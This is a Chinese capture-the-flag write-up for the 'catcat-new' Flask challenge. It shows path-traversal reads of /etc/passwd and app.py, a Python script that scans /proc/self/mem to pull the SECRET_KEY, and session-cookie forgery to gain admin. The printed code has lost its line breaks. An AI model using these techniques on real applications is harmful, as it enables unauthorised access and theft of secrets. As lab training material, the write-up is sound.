攻防世界——web题catcat-new session值伪造

先看看网站信息

没看出来什么，用别的指纹识别工具试试

whatweb -a 3 http://61.147.171.103:55326

 猜测应该是 flask框架，然后再具体看网站可能的漏洞

当随便点击一个哈基米图片时，发现URL：
 

猜测有任意文件读取，尝试：info?file=../../../../etc/passwd

发现确实能读取文件，既然可能是flask框架，看看能不能读到app.py

info?file=../app.py 

发现源码，让AI帮我们整理一下；

import os
import uuid
from flask import Flask, request, session, render_template, Markup
from cat import catflag = ""app = Flask(__name__,static_url_path='/',static_folder='static'
)app.config['SECRET_KEY'] = str(uuid.uuid4()).replace("-", "") + "*abcdefgh"if os.path.isfile("/flag"):flag = cat("/flag")os.remove("/flag")@app.route('/', methods=['GET'])
def index():detailtxt = os.listdir('./details/')cats_list = []for i in detailtxt:cats_list.append(i[:i.index('.')])return render_template("index.html", cats_list=cats_list, cat=cat)@app.route('/info', methods=["GET", 'POST'])
def info():filename = "./details/" + request.args.get('file', "")start = request.args.get('start', "0")end = request.args.get('end', "0")name = request.args.get('file', "")[:request.args.get('file', "").index('.')]return render_template("detail.html", catname=name, info=cat(filename, start, end))@app.route('/admin', methods=["GET"])
def admin_can_list_root():if session.get('admin') == 1:return flagelse:session['admin'] = 0return "NoNoNo"if __name__ == '__main__':app.run(host='0.0.0.0', debug=False, port=5637)

发现获取flag的方法：验证session.get('admin')==1，这里首先要伪造一个session:admin=1

要伪造session需要secret_key,接下来就是获取secret_key

（1）为防止session值被篡改，框架会使用secret_key对session数据进行签名或加密，若想要伪造有效的session，就得先获得服务器的secret_key。而若服务器中存在任意文件读取漏洞，攻击者就可读取服务器进程的内存数据（例如通过/proc/self/mem文件），从中搜索并提取secret_key。

（2）但若直接读取该文件（/proc/self/mem）会返回整个进程的内存数据，其中大部分是无效或不可访问的内容，而我们要找的是可读写的内存区域，这个时候就得先读取/proc/self/maps了

（3）/proc/self/maps 用于记录当前进程的内存映射信息，包括：内存区域的起始和结束地址、可读写的区域、映射的文件

访问：info?file=../../proc/self/maps

将得到的内容保存为：test.txt 然后根据下面这段代码：

发现密钥后面拼接了*abcdefgh

可以编写脚本来找密钥，这里我参考的是这位师傅的wp：【攻防世界】catcat-new-CSDN博客

import re
import requestsmaps=open("D:\\pycharm_projects\\POC\\test.txt")
context=maps.read()
lst=context.split('\\n')# 映射表中的内容是一行一行的for line in lst:if 'rw' in line:addr=re.search('([0-9a-f]+)-([0-9a-f]+)',line)# 找到可读写的地址,使用正则表达式匹配类似：01234567-89abcdef 这样的地址区间start=int(addr.group(1),16)end=int(addr.group(2),16)print(start,end)url=f"http://61.147.171.103:55326/info?file=../../proc/self/mem&start={start}&end={end}" response=requests.get(url)secret_key=re.findall("[a-z0-9]{32}\*abcdefgh",response.text)if secret_key:print(secret_key)break

得到密钥值： 65795bf5bf734fba94bd2e9073068bd5*abcdefgh

然后借助：flask_session_cookie_manager工具伪造session（该工具需要用python3），工具地址为：https://github.com/noraj/flask-session-cookie-manager

先通过抓包获得session值：

然后先解密得到session的格式：

也就是说我们要的应该是：{'admin':1}

再进行伪造session：
 

将得到的session值再拼接到请求包中，注意路由是：/admin

成功得到flag